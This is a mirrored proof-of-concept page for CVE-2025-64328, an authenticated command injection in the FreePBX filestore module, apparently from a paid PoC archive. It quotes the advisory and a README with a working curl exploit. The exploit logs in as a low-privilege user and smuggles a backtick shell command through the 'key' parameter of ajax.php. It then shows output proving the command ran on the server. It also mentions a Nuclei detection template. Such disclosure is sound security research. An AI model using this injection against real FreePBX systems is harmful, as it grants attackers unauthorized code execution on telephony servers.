Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-64328 PoC — FreePBX Administration GUI is Vulnerable to Authenticated Command Injection

Source
https://github.com/mcorybillington/CVE-2025-64328_FreePBX-framework-Command-Injection
Associated Vulnerability
Title:FreePBX Administration GUI is Vulnerable to Authenticated Command Injection (CVE-2025-64328)
Description:FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX systems. In versions 17.0.2.36 and above before 17.0.3, the filestore module within the Administrative interface is vulnerable to a post-authentication command injection by an authenticated known user via the testconnection -> check_ssh_connect() function. An attacker can leverage this vulnerability to obtain remote access to the system as an asterisk user. This issue is fixed in version 17.0.3.
Description
CVE-2025-64328 FreePBX Authenticated Command Injection in the framework module.
Readme
# CVE-2025-64328 FreePBX Authenticated Command Injection in `framework` module

Simple proof of concept repository for CVE-2025-64328 FreePBX Authenticated Command Injection in the `framework` module.

Full writeup here: https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/

## `curl` proof of concept
```
$ curl -s \
-XPOST --cookie-jar /tmp/freepbx-cookie --data 'username=lowprivuser&password=<lowprivuserpassword>' http://192.168.122.206/admin/config.php -o /dev/null \
--next \
--cookie /tmp/freepbx-cookie -H 'Referer: http://192.168.122.206' 'http://192.168.122.206/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user=asdf&port=22&key=asdf`echo%20rcetest2>/var/www/html/rcetest.txt`&path=test' | jq
{
  "status": true,
  "message": "Login failed"
}

$ curl -sk http://192.168.122.206/rcetest.txt
rcetest2
```
## Nuclei template:

[CVE-2025-64328.yaml](./CVE-2025-64328.yaml)
File Snapshot

 [4.0K]  /data/pocs/7ab9202fc269988b154a2d2ee67fe76c748c28ea
├── [2.2K]  CVE-2025-64328.yaml
└── [ 939]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →